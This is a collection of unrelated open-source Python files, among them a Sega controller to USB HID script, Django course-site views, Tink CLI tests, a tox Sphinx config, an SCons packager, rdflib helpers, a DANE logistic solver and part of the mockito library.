def __init__(self, devices):
# Find the stick we defined in boot.py
self._stick_device = find_device(devices, usage_page=0x1, usage=0x04)
self._report = bytearray(3)
def update(self, a,b,c,x,y,z,start,mode,l,r,u,d):
"""update
passed the Sega Genesis/Megadrive Controller State for transmission to the USB Host
returns nothing
"""
# The first byte contains the 8 button states (1 = pressed, 0 = released)
self._report[0] = int(f"{mode:1n}{start:1n}{z:1n}{y:1n}{x:1n}{c:1n}{b:1n}{a:1n}" ,2)
# The second byte contains the x-axis (0 = left, 127 = centre, 255 = right)
self._report[1] = 127
if int(l) == True:
self._report[1] = 0
if int(r) == True:
self._report[1] = 255
# The third byte contains the y-axis (0 = left, 127 = centre, 255 = right)
self._report[2] = 127
if int(u) == True:
self._report[2] = 0
if int(d) == True:
self._report[2] = 255
# Transmit the USB update
self._stick_device.send_report(self._report)
def sega():
"""sega
Read the Sega Genesis/Megadrive Controller State and send USB Updates
returns nothing
"""
oldstring = None
while 1:
controller = "-"
button_up = False
button_down = False
button_left = False
button_right = False
button_a = False
button_b = False
button_c = False
button_x = False
button_y = False
button_z = False
button_start = False
button_mode = False
# A detailed description of the controller states are described in https://www.raspberryfield.life/2019/03/25/sega-mega-drive-genesis-6-button-xyz-controller/
# Start State 0
controllerpins_out["select"].value = False
# Start State 1
controllerpins_out["select"].value = True
# Start State 2
controllerpins_out["select"].value = False
# If both left_x and right_mode are LOW then we have a 3 Button Controller
if (
controllerpins_in["left_x"].value == False
and controllerpins_in["right_mode"].value == False
):
controller = 3
if controllerpins_in["a_b"].value == False:
button_a = True
if controllerpins_in["c_start"].value == False:
button_start = True
# Start State 3
controllerpins_out["select"].value = True
if controllerpins_in["up_z"].value == False:
button_up = True
if controllerpins_in["down_y"].value == False:
button_down = True
if controllerpins_in["left_x"].value == False:
button_left = True
if controllerpins_in["right_mode"].value == False:
button_right = True
if controllerpins_in["a_b"].value == False:
button_b = True
if controllerpins_in["c_start"].value == False:
button_c = True
# Start State 4
controllerpins_out["select"].value = False
# If both up_z and down_y are LOW then we have a 6 Button Controller
if (
controllerpins_in["up_z"].value == False
and controllerpins_in["down_y"].value == False
):
controller = 6
# Start State 5 (if controller == 6)
controllerpins_out["select"].value = True
time.sleep(0.001)
if controllerpins_in["right_mode"].value == False:
button_mode = True
if controllerpins_in["up_z"].value == False:
button_z = True
if controllerpins_in["down_y"].value == False:
button_y = True
if controllerpins_in["left_x"].value == False:
button_x = True
# Start State 6 (if controller == 6)
controllerpins_out["select"].value = False
time.sleep(0.001)
# Start State 7 (if controller == 6)
time.sleep(0.001)
controllerpins_out["select"].value = True
newstring = f"{controller}{button_up:1n}{button_down:1n}{button_left:1n}{button_right:1n}{button_start:1n}{button_a:1n}{button_b:1n}{button_c:1n}{button_x:1n}{button_y:1n}{button_z:1n}{button_mode:1n}"
# Only update if something has changed since last time
if newstring != oldstring:
# the following two lines is to help with debugging
# print("TUDLRSABCXYZM")
# print(newstring)
st.update(button_a,button_b,button_c,button_x,button_y,button_z,button_start,button_mode,button_left,button_right,button_up,button_down)
oldstring = newstring
# adding a delay for allowing the controller to reset after state reading
time.sleep(0.03)
if __name__ == "__main__":
time.sleep(1)
try:
st=Stick(usb_hid.devices)
except:
print("Problem with usb_hid.devices")
sega() |
the-stack_106_30557 | # _*_ encoding:utf-8 _*_
from django.shortcuts import render
from django.views.generic import View
from django.http import HttpResponse
import json
from django.contrib.auth.mixins import LoginRequiredMixin
from pure_pagination import Paginator, PageNotAnInteger
from .models import CourseOrg, CityDict, Teacher
from operation.models import UserFavorite
from courses.models import Courses
from .forms import UserAskForm
# Create your views here.
class OrgView(View):
"""
课程机构列表功能
"""
def get(self, request):
# 课程机构
all_orgs = CourseOrg.objects.all()
hot_orgs = all_orgs.order_by("-click_nums")[:3]
# 城市
all_citys = CityDict.objects.all()
# 取出筛选城市
city_id = request.GET.get('city', "")
if city_id:
all_orgs = all_orgs.filter(city_id=int(city_id))
# 类别筛选
category = request.GET.get('ct', "")
if category:
all_orgs = all_orgs.filter(category=category)
sort = request.GET.get('sort', "")
if sort:
if sort == "students":
all_orgs = all_orgs.order_by("-students")
elif sort == "courses":
all_orgs = all_orgs.order_by("-course_nums")
org_nums = all_orgs.count()
# 对课程机构进行分页
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
page = 1
p = Paginator(all_orgs, 5, request=request)
orgs = p.page(page)
return render(request, "org-list.html", {
"all_orgs": orgs,
"all_citys": all_citys,
"org_nums": org_nums,
"city_id": city_id,
"category": category,
"hot_orgs": hot_orgs,
"sort": sort,
})
class AddUserAskView(View):
"""
用户添加咨询
"""
def post(self, request):
userask_form = UserAskForm(request.POST)
if userask_form.is_valid():
userask_form.save(commit=True)
json_success_data = {'status': 'success'}
return HttpResponse(json.dumps(json_success_data),
content_type="application/json")
else:
json_fail_data = {'status': 'fail', 'msg': u'添加出错'}
return HttpResponse(json.dumps(json_fail_data),
content_type="application/json")
class OrgHomeView(View):
"""
机构首页
"""
def get(self, request, org_id):
current_page = "home"
course_org = CourseOrg.objects.get(id=int(org_id))
course_org.click_nums += 1
course_org.save()
has_fav = False
if request.user.is_authenticated():
if UserFavorite.objects.filter(user=request.user, fav_id=course_org.id, fav_type=2):
has_fav = True
course_org = CourseOrg.objects.get(id=int(org_id))
all_courses = course_org.courses_set.all()[:3]
all_teachers = course_org.teacher_set.all()[:1]
return render(request, 'org-detail-homepage.html', {
"all_courses": all_courses,
"all_teachers": all_teachers,
"course_org": course_org,
"current_page": current_page,
'has_fav': has_fav,
})
class OrgCourseView(View):
"""
机构课程列表页
"""
def get(self, request, org_id):
current_page = "course"
course_org = CourseOrg.objects.get(id=int(org_id))
has_fav = False
if request.user.is_authenticated():
if UserFavorite.objects.filter(user=request.user, fav_id=course_org.id, fav_type=2):
has_fav = True
all_courses = course_org.courses_set.all()[:3]
return render(request, 'org-detail-course.html', {
"all_courses": all_courses,
"course_org": course_org,
"current_page": current_page,
'has_fav': has_fav,
})
class OrgDescView(View):
"""
机构介绍页
"""
def get(self, request, org_id):
current_page = "desc"
course_org = CourseOrg.objects.get(id=int(org_id))
has_fav = False
if request.user.is_authenticated():
if UserFavorite.objects.filter(user=request.user, fav_id=course_org.id, fav_type=2):
has_fav = True
return render(request, 'org-detail-desc.html', {
"course_org": course_org,
"current_page": current_page,
'has_fav': has_fav,
})
class OrgTeacherView(View):
"""
机构教师页
"""
def get(self, request, org_id):
current_page = "teacher"
course_org = CourseOrg.objects.get(id=int(org_id))
has_fav = False
if request.user.is_authenticated():
if UserFavorite.objects.filter(user=request.user, fav_id=course_org.id, fav_type=2):
has_fav = True
all_teachers = course_org.teacher_set.all()
return render(request, 'org-detail-teachers.html', {
"all_teachers": all_teachers,
"course_org": course_org,
"current_page": current_page,
'has_fav': has_fav,
})
class AddFavView(View):
"""
用户收藏,用户取消收藏
"""
def post(self, request):
# fav_id和fav_type是org_base.html中Ajax传入的
fav_id = request.POST.get('fav_id', 0)
fav_type = request.POST.get('fav_type', 0)
# 判断用户登录状态
if not request.user.is_authenticated():
json_fail_data_notlogin = {'status': 'fail', 'msg': '用户未登录'}
return HttpResponse(json.dumps(json_fail_data_notlogin),
content_type="application/json")
exist_records = UserFavorite.objects.filter(user=request.user,
fav_id=int(fav_id), fav_type=int(fav_type))
if exist_records:
# 如果记录已经存在,则表示用户取消收藏
exist_records.delete()
if int(fav_type) == 1:
course = Courses.objects.get(id=int(fav_id))
course.fav_nums -= 1
if course.fav_nums < 0:
course.fav_nums = 0
course.save()
elif int(fav_type) == 2:
course_org = CourseOrg.objects.get(id=int(fav_id))
course_org.fav_nums -= 1
if course_org.fav_nums < 0:
course_org.fav_nums = 0
course_org.save()
elif int(fav_type) == 3:
teacher = Teacher.objects.get(id=int(fav_id))
teacher.fav_nums -= 1
if teacher.fav_nums < 0:
teacher.fav_nums = 0
teacher.save()
json_success_data_cancelfav = {'status': 'success', 'msg': '收藏'}
return HttpResponse(json.dumps(json_success_data_cancelfav), content_type="application/json")
else:
user_fav = UserFavorite()
if int(fav_id) > 0 and int(fav_type) > 0:
user_fav.user = request.user
user_fav.fav_id = int(fav_id)
user_fav.fav_type = int(fav_type)
user_fav.save()
if int(fav_type) == 1:
course = Courses.objects.get(id=int(fav_id))
course.fav_nums += 1
course.save()
elif int(fav_type) == 2:
course_org = CourseOrg.objects.get(id=int(fav_id))
course_org.fav_nums += 1
course_org.save()
elif int(fav_type) == 3:
teacher = Teacher.objects.get(id=int(fav_id))
teacher.fav_nums += 1
teacher.save()
json_success_data = {'status': 'success', 'msg': '已收藏'}
return HttpResponse(json.dumps(json_success_data), content_type="application/json")
else:
json_fail_data_error = {'status': 'fail', 'msg': '收藏出错'}
return HttpResponse(json.dumps(json_fail_data_error), content_type="application/json")
class TeacherListView(View):
"""
课程讲师列表页
"""
def get(self, request):
all_teachers = Teacher.objects.all()
sort = request.GET.get('sort', "")
if sort:
if sort == "hot":
all_teachers = all_teachers.order_by("-click_nums")
# 讲师排行
sorted_teacher = Teacher.objects.all().order_by("-click_nums")[:3]
teacher_nums = all_teachers.count()
# 对讲师进行分页
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
page = 1
p = Paginator(all_teachers, 5, request=request)
teachers = p.page(page)
return render(request, "teachers-list.html", {
"all_teachers": teachers,
"sort": sort,
"sorted_teacher": sorted_teacher,
"teacher_nums": teacher_nums,
})
class TeacherDetailView(View):
def get(self, request, teacher_id):
teacher = Teacher.objects.get(id=int(teacher_id))
teacher.click_nums += 1
teacher.save()
all_courses = Courses.objects.filter(teacher=teacher)
has_teacher_faved = False
has_org_faved = False
if request.user.is_authenticated():
if UserFavorite.objects.filter(user=request.user, fav_type=3, fav_id=int(teacher.id)):
has_teacher_faved = True
if UserFavorite.objects.filter(user=request.user, fav_type=2, fav_id=int(teacher.org.id)):
has_org_faved = True
# 讲师排行
sorted_teacher = Teacher.objects.all().order_by("-click_nums")[:3]
return render(request, "teacher-detail.html",{
"teacher": teacher,
"all_courses": all_courses,
"sorted_teacher": sorted_teacher,
"has_teacher_faved": has_teacher_faved,
"has_org_faved": has_org_faved,
}) |
the-stack_106_30559 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tink.tools.testing.cross_language.util.tinkey_cli."""
from absl.testing import absltest
from absl.testing import parameterized
from tools.testing.cross_language.util import cli_aead
from tools.testing.cross_language.util import cli_daead
from tools.testing.cross_language.util import cli_hybrid
from tools.testing.cross_language.util import cli_mac
from tools.testing.cross_language.util import cli_tinkey
class TinkeyCliWrapperTest(parameterized.TestCase):
@parameterized.parameters(*cli_tinkey.AEAD_KEY_TEMPLATES)
def test_generate_encrypt_decrypt(self, key_template):
keyset_handle = cli_tinkey.generate_keyset_handle(key_template)
primitive = cli_aead.CliAead('java', keyset_handle)
plaintext = b'plaintext'
associated_data = b'associated_data'
ciphertext = primitive.encrypt(plaintext, associated_data)
output = primitive.decrypt(ciphertext, associated_data)
self.assertEqual(output, plaintext)
def test_generate_encrypt_decrypt_deterministically(self):
keyset_handle = cli_tinkey.generate_keyset_handle(
cli_tinkey.DAEAD_KEY_TEMPLATE)
p = cli_daead.CliDeterministicAead('java', keyset_handle)
plaintext = b'plaintext'
associated_data = b'associated_data'
ciphertext = p.encrypt_deterministically(plaintext, associated_data)
output = p.decrypt_deterministically(ciphertext, associated_data)
self.assertEqual(output, plaintext)
@parameterized.parameters(*cli_tinkey.MAC_KEY_TEMPLATES)
def test_mac_generate_compute_verify(self, key_template):
keyset_handle = cli_tinkey.generate_keyset_handle(key_template)
p = cli_mac.CliMac('java', keyset_handle)
data = b'data'
mac_value = p.compute_mac(data)
self.assertIsNone(p.verify_mac(mac_value, data))
@parameterized.parameters(*cli_tinkey.HYBRID_KEY_TEMPLATES)
def test_hybrid_generate_encrypt_decrypt(self, key_template):
private_handle = cli_tinkey.generate_keyset_handle(key_template)
public_handle = cli_tinkey.public_keyset_handle(private_handle)
enc = cli_hybrid.CliHybridEncrypt('java', public_handle)
dec = cli_hybrid.CliHybridDecrypt('java', private_handle)
plaintext = b'plaintext'
context_info = b'context_info'
ciphertext = enc.encrypt(plaintext, context_info)
output = dec.decrypt(ciphertext, context_info)
self.assertEqual(output, plaintext)
if __name__ == '__main__':
absltest.main()
|
the-stack_106_30562 | import os
import re
import subprocess
import sys
from datetime import date
from pathlib import Path
from docutils import nodes
from sphinx import addnodes
from sphinx.util import logging
import tox
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.extlinks",
"sphinx.ext.intersphinx",
"sphinx.ext.viewcode",
"sphinxcontrib.autoprogram",
]
ROOT_SRC_TREE_DIR = Path(__file__).parents[1]
def generate_draft_news():
home = "https://github.com"
issue = f"{home}/issue"
fragments_path = ROOT_SRC_TREE_DIR / "docs" / "changelog"
for pattern, replacement in (
(r"[^`]@([^,\s]+)", rf"`@\1 <{home}/\1>`_"),
(r"[^`]#([\d]+)", rf"`#pr\1 <{issue}/\1>`_"),
):
for path in fragments_path.glob("*.rst"):
path.write_text(re.sub(pattern, replacement, path.read_text()))
env = os.environ.copy()
env["PATH"] += os.pathsep.join(
[os.path.dirname(sys.executable)] + env["PATH"].split(os.pathsep),
)
changelog = subprocess.check_output(
["towncrier", "--draft", "--version", "DRAFT"],
cwd=str(ROOT_SRC_TREE_DIR),
env=env,
).decode("utf-8")
if "No significant changes" in changelog:
content = ""
else:
note = "*Changes in master, but not released yet are under the draft section*."
content = f"{note}\n\n{changelog}"
(ROOT_SRC_TREE_DIR / "docs" / "_draft.rst").write_text(content)
generate_draft_news()
project = "tox"
_full_version = tox.__version__
release = _full_version.split("+", 1)[0]
version = ".".join(release.split(".")[:2])
author = "holger krekel and others"
year = date.today().year
copyright = f"2010-{year}, {author}"
master_doc = "index"
source_suffix = ".rst"
exclude_patterns = ["changelog/*"]
templates_path = ["_templates"]
pygments_style = "sphinx"
html_theme = "alabaster"
html_theme_options = {
"logo": "img/tox.png",
"github_user": "tox-dev",
"github_repo": "tox",
"description": "standardise testing in Python",
"github_banner": "true",
"github_type": "star",
"travis_button": "false",
"badge_branch": "master",
"fixed_sidebar": "false",
}
html_sidebars = {
"**": ["about.html", "localtoc.html", "relations.html", "searchbox.html", "donate.html"],
}
html_favicon = "_static/img/toxfavi.ico"
html_show_sourcelink = False
html_static_path = ["_static"]
htmlhelp_basename = f"{project}doc"
latex_documents = [("index", "tox.tex", f"{project} Documentation", author, "manual")]
man_pages = [("index", project, f"{project} Documentation", [author], 1)]
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
suppress_warnings = ["epub.unknown_project_files"] # Prevent barking at `.ico`
intersphinx_mapping = {"https://docs.python.org/": None}
def setup(app):
def parse_node(env, text, node):
args = text.split("^")
name = args[0].strip()
node += addnodes.literal_strong(name, name)
if len(args) > 2:
default = f"={args[2].strip()}"
node += nodes.literal(text=default)
if len(args) > 1:
content = f"({args[1].strip()})"
node += addnodes.compact_paragraph(text=content)
return name # this will be the link
app.add_object_type(
directivename="conf",
rolename="conf",
objname="configuration value",
indextemplate="pair: %s; configuration value",
parse_node=parse_node,
)
tls_cacerts = os.getenv("SSL_CERT_FILE") # we don't care here about the validity of certificates
linkcheck_timeout = 30
linkcheck_ignore = [r"https://holgerkrekel.net"]
extlinks = {
"issue": ("https://github.com/tox-dev/tox/issues/%s", "#"),
"pull": ("https://github.com/tox-dev/tox/pull/%s", "p"),
"user": ("https://github.com/%s", "@"),
}
nitpicky = True
nitpick_ignore = [
("py:class", "tox.interpreters.InterpreterInfo"),
]
# workaround for https://github.com/sphinx-doc/sphinx/issues/10112
logging.getLogger("sphinx.ext.extlinks").setLevel(40)
language = 'zh_CN'
gettext_compact = False
locale_dirs = ['../locales/'] |
the-stack_106_30563 | """SCons.Tool.Packaging.tarbz2
The tarbz2 SRC packager.
"""
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
from SCons.Tool.packaging import putintopackageroot
def package(env, target, source, PACKAGEROOT, **kw):
bld = env['BUILDERS']['Tar']
bld.set_suffix('.tar.bz2')
target, source = putintopackageroot(target, source, env, PACKAGEROOT, honor_install_location=0)
return bld(env, target, source, TARFLAGS='-jc')
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
the-stack_106_30564 | # Karen Byrne 29th April 2018
#https://stackoverflow.com/questions/45862223/use-different-colors-in-scatterplot-for-iris-dataset?utm_medium=organic&utm_source=google_rich_qa&utm_campaign=google_rich_qa
# I found this code which returns a scatter plot showing the clusters in the data
#I could not get the file to run correctly in time for the deadline but it is somwthing to work from
import matplotlib.pyplot as plt
import seaborn as sns
iris = sns.load_dataset("data/iristest.csv")
ratio = iris["sepal_length"]/iris["sepal_width"]
for name, group in iris.groupby("species"):
plt.scatter(group.index, ratio[group.index], label=name)
plt.legend()
plt.show()
|
the-stack_106_30565 | from contextlib import contextmanager
from itertools import chain
from rdflib.graph import (
ReadOnlyGraphAggregate, Dataset, Graph, ConjunctiveGraph)
from rdflib.paths import Path
from .globals import _dataset_ctx_stack
class DatasetGraphAggregation(ReadOnlyGraphAggregate):
def __init__(self, graphs, store='default'):
if store is not None:
super(ReadOnlyGraphAggregate, self).__init__(store)
Graph.__init__(self, store)
self.__namespace_manager = None
self.graphs = graphs
def triples(self, xxx_todo_changeme8):
(s, p, o) = xxx_todo_changeme8
graphs = chain(*(g.contexts() if isinstance(g, Dataset)
else (g,) for g in self.graphs))
for graph in graphs:
if isinstance(p, Path):
for s, o in p.eval(self, s, o):
yield s, p, o
else:
for s1, p1, o1 in graph.triples((s, p, o)):
yield (s1, p1, o1)
class GraphGetter(object):
def __init__(self, ds=None):
self.ds = ds
self.map = {}
self.aggregation = DatasetGraphAggregation(self.map.values())
def __get__(self, instance, owner):
if instance is None:
return self
if not 'g' in instance.__dict__:
instance.g = GraphGetter(ds=instance)
return instance.g
def __getitem__(self, name):
if name is None:
return self.ds.graph()
return self.map[name]
def __setitem__(self, name, identifier):
self.map[name] = self.ds.graph(identifier)
return self.map[name]
def _push_dataset_ctx(**graph_descriptors):
ds = NamedContextDataset()
ds.g['pool'] = Dataset()
for name, descriptor in graph_descriptors.items():
if set(descriptor).intersection(set(('data', 'file', 'source'))):
ds.g[name] = ds.parse(**descriptor)
for ns in ds.g[name].namespaces():
ds.bind(*ns)
else:
ds.g[name] = ConjunctiveGraph()
_dataset_ctx_stack.push(ds)
return ds
def _pop_dataset_ctx():
_dataset_ctx_stack.pop()
class NamedContextDataset(Dataset):
g = GraphGetter()
@contextmanager
def context(**graph_descriptors):
try:
yield _push_dataset_ctx(**graph_descriptors)
finally:
_pop_dataset_ctx()
|
the-stack_106_30566 | import torch
dependencies = ['torch']
def highres2dnet(*args, **kwargs):
"""
HighRes2DNet in the style of
HighRes3DNet by Li et al. 2017 for T1-MRI brain parcellation
"""
from highresnet import HighRes2DNet
model = HighRes2DNet(*args, **kwargs)
return model
def highres3dnet(*args, pretrained=False, **kwargs):
"""
HighRes3DNet by Li et al. 2017 for T1-MRI brain parcellation
pretrained (bool): load parameters from pretrained model
"""
from highresnet import HighRes3DNet
if pretrained:
model = HighRes3DNet(
*args,
in_channels=1,
out_channels=160,
add_dropout_layer=True,
**kwargs,
)
url_dir = 'https://github.com/fepegar/highresnet/raw/master'
url = '{}/highres3dnet_li_parameters-7d297872.pth'.format(url_dir)
state_dict = torch.hub.load_state_dict_from_url(
url, progress=False, map_location='cpu')
model.load_state_dict(state_dict)
else:
model = HighRes3DNet(*args, **kwargs)
return model
|
the-stack_106_30567 | import numpy
import sys
from Algorithms.Logistic.Executor.logistic_executor import LogisticExecutor
from Utils.conjugate_gradient_method import conjugate_solver
home_dir = '../../../'
sys.path.append(home_dir)
eta_list = [1, 0.1, 0.001, 0.0001, 0.000001]
class DANELogisticExecutor(LogisticExecutor):
def __init__(self, x_mat, y_vec):
super().__init__(x_mat, y_vec)
self.global_gradient = numpy.zeros((self.d, 1))
def update_global_gradient(self, g):
self.global_gradient = g
def set_w(self, w):
self.w = w
def compute_gradient_for_w(self, w_vec):
z_vec = numpy.dot(self.x_mat, w_vec)
z_vec = numpy.multiply(z_vec, self.y_vec)
exp_z_vec = numpy.exp(z_vec)
vec_for_grad = numpy.multiply(-1 / (1 + exp_z_vec), self.y_vec)
grad_term = numpy.dot(self.x_mat.T, vec_for_grad)
return grad_term / self.s + self.gamma * w_vec
def compute_batch_gradient(self, x_blk, y_blk, batch_size, w):
z_vec = numpy.dot(x_blk, w)
z_vec = numpy.multiply(z_vec, y_blk)
exp_z_vec = numpy.exp(z_vec)
vec_for_gradient = numpy.multiply(-1 / (1 + exp_z_vec), y_blk)
gradient_term = numpy.dot(x_blk.T, vec_for_gradient)
return gradient_term / batch_size + self.gamma * w
def objective_function_for_local_prob(self, h_vec, alpha, mu):
first_term = self.objective_function(self.w + h_vec)
second_term = numpy.sum(numpy.dot((self.g - alpha * self.global_gradient).T, h_vec))
return first_term - second_term + mu / 2 * numpy.linalg.norm(h_vec) ** 2
def gradient_descent_solver(self, alpha=1, rho=0.5, beta=0.2, mu=0.001, max_iter=50):
"""
solve min f_i(w_t + h) - (g_i(w_t) - alpha * g(w_t)).T * h
"""
a = alpha
h_vec = numpy.zeros((self.d, 1))
for i in range(max_iter):
grad = self.compute_gradient_for_w(self.w + h_vec) - (
self.compute_gradient_for_w(self.w) - alpha * self.global_gradient) + mu * h_vec
eta = 0
for j in range(len(eta_list)):
eta = eta_list[j]
objective_val_old = self.objective_function_for_local_prob(h_vec, eta, mu)
if self.objective_function_for_local_prob(h_vec - eta_list[j] * grad, eta, mu) < objective_val_old - \
eta_list[j] * beta * numpy.linalg.norm(grad) ** 2:
break
h_vec = numpy.subtract(h_vec, eta * grad)
return h_vec
def svrg_solver(self, max_iter=10, alpha=0.0000001):
batch_size = int(numpy.ceil(self.s / max_iter))
w = numpy.zeros((self.d, 1))
for i in range(max_iter):
w_tilde = numpy.copy(w)
for j in range(max_iter):
idx = numpy.random.choice(self.s, batch_size)
rand_x_blk = self.x_mat[idx, :]
rand_y_blk = self.y_vec[idx]
objective_value_old = 1e10
w_vec = numpy.zeros((self.d, 1))
for eta in eta_list:
full_gradient = self.compute_gradient_for_w(w_tilde) - self.compute_gradient_for_w(
self.w) + eta * self.global_gradient + alpha * (w - self.w)
batch_gradient = self.compute_batch_gradient(rand_x_blk, rand_y_blk, batch_size,
w) - self.compute_batch_gradient(rand_x_blk,
rand_y_blk,
batch_size,
w_tilde) + full_gradient
w_new = w - eta * batch_gradient
objective_value_new = self.objective_function(w_new)
if objective_value_new < objective_value_old:
objective_value_old = objective_value_new
w_vec = w_new
w = w_vec
return w
def compute_local_statistics_with_info(self, v):
v_exp = 0
for i in range(self.d):
v_exp += v[i]
v_exp /= self.d
v_var = 0
for i in range(self.d):
v_var += (v[i] - v_exp) ** 2
v_var /= self.d
return v_exp, v_var
|
the-stack_106_30568 | # Copyright (c) 2008-2016 Szczepan Faber, Serhiy Oplakanets, Herr Kaste
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import functools
import inspect
import operator
from collections import deque
from . import invocation, signature, utils
from .mock_registry import mock_registry
__all__ = ['mock']
__tracebackhide__ = operator.methodcaller(
"errisinstance",
invocation.InvocationError
)
MYPY = False
if MYPY:
from typing import Deque, Union
RealInvocation = Union[
invocation.RememberedInvocation,
invocation.RememberedProxyInvocation
]
class _Dummy(object):
# We spell out `__call__` here for convenience. All other magic methods
# must be configured before use, but we want `mock`s to be callable by
# default.
def __call__(self, *args, **kwargs):
return self.__getattr__('__call__')(*args, **kwargs) # type: ignore[attr-defined] # noqa: E501
def remembered_invocation_builder(mock, method_name, *args, **kwargs):
invoc = invocation.RememberedInvocation(mock, method_name)
return invoc(*args, **kwargs)
class Mock(object):
def __init__(self, mocked_obj, strict=True, spec=None):
self.mocked_obj = mocked_obj
self.strict = strict
self.spec = spec
self.invocations = deque() # type: Deque[RealInvocation]
self.stubbed_invocations = deque() \
# type: Deque[invocation.StubbedInvocation]
self.original_methods = {}
self._signatures_store = {}
def remember(self, invocation):
self.invocations.appendleft(invocation)
def finish_stubbing(self, stubbed_invocation):
self.stubbed_invocations.appendleft(stubbed_invocation)
def clear_invocations(self):
self.invocations = deque()
# STUBBING
def get_original_method(self, method_name):
"""
Looks up the original method on the `spec` object and returns it
together with an indication of whether the method is found
"directly" on the `spec` object.
This is used to decide whether the method should be stored as an
original_method and should therefore be replaced when unstubbing.
"""
if self.spec is None:
return None, False
try:
return self.spec.__dict__[method_name], True
except (AttributeError, KeyError):
# Classes with defined `__slots__` and then no `__dict__` are not
# patchable but if we catch the `AttributeError` here, we get
# the better error message for the user.
return getattr(self.spec, method_name, None), False
def set_method(self, method_name, new_method):
setattr(self.mocked_obj, method_name, new_method)
def replace_method(self, method_name, original_method):
def new_mocked_method(*args, **kwargs):
# we throw away the first argument, if it's either self or cls
if (
inspect.ismethod(new_mocked_method)
or inspect.isclass(self.mocked_obj)
and not isinstance(new_mocked_method, staticmethod)
):
args = args[1:]
return remembered_invocation_builder(
self, method_name, *args, **kwargs)
new_mocked_method.__name__ = method_name
if original_method:
new_mocked_method.__doc__ = original_method.__doc__
new_mocked_method.__wrapped__ = original_method # type: ignore[attr-defined] # noqa: E501
try:
new_mocked_method.__module__ = original_method.__module__
except AttributeError:
pass
if inspect.ismethod(original_method):
new_mocked_method = utils.newmethod(
new_mocked_method, self.mocked_obj
)
if isinstance(original_method, staticmethod):
new_mocked_method = staticmethod(new_mocked_method) # type: ignore[assignment] # noqa: E501
elif isinstance(original_method, classmethod):
new_mocked_method = classmethod(new_mocked_method) # type: ignore[assignment] # noqa: E501
elif (
inspect.isclass(self.mocked_obj)
and inspect.isclass(original_method) # TBC: Inner classes
):
new_mocked_method = staticmethod(new_mocked_method) # type: ignore[assignment] # noqa: E501
self.set_method(method_name, new_mocked_method)
def stub(self, method_name):
try:
self.original_methods[method_name]
except KeyError:
original_method, was_in_spec = self.get_original_method(
method_name)
if was_in_spec:
# This indicates the original method was found directly on
# the spec object and should therefore be restored by unstub
self.original_methods[method_name] = original_method
else:
self.original_methods[method_name] = None
self.replace_method(method_name, original_method)
def forget_stubbed_invocation(self, invocation):
assert invocation in self.stubbed_invocations
if len(self.stubbed_invocations) == 1:
mock_registry.unstub(self.mocked_obj)
return
self.stubbed_invocations.remove(invocation)
if not any(
inv.method_name == invocation.method_name
for inv in self.stubbed_invocations
):
original_method = self.original_methods.pop(invocation.method_name)
self.restore_method(invocation.method_name, original_method)
def restore_method(self, method_name, original_method):
# If original_method is None, we *added* it to mocked_obj, so we
# must delete it here.
# If we mocked an instance, our mocked function will actually hide
# the one on its class, so we delete as well.
if (
not original_method
or not inspect.isclass(self.mocked_obj)
and inspect.ismethod(original_method)
):
delattr(self.mocked_obj, method_name)
else:
self.set_method(method_name, original_method)
def unstub(self):
while self.original_methods:
method_name, original_method = self.original_methods.popitem()
self.restore_method(method_name, original_method)
# SPECCING
def has_method(self, method_name):
if self.spec is None:
return True
return hasattr(self.spec, method_name)
def get_signature(self, method_name):
if self.spec is None:
return None
try:
return self._signatures_store[method_name]
except KeyError:
sig = signature.get_signature(self.spec, method_name)
self._signatures_store[method_name] = sig
return sig
class _OMITTED(object):
def __repr__(self):
return 'OMITTED'
OMITTED = _OMITTED()
def mock(config_or_spec=None, spec=None, strict=OMITTED):
"""Create 'empty' objects ('Mocks').
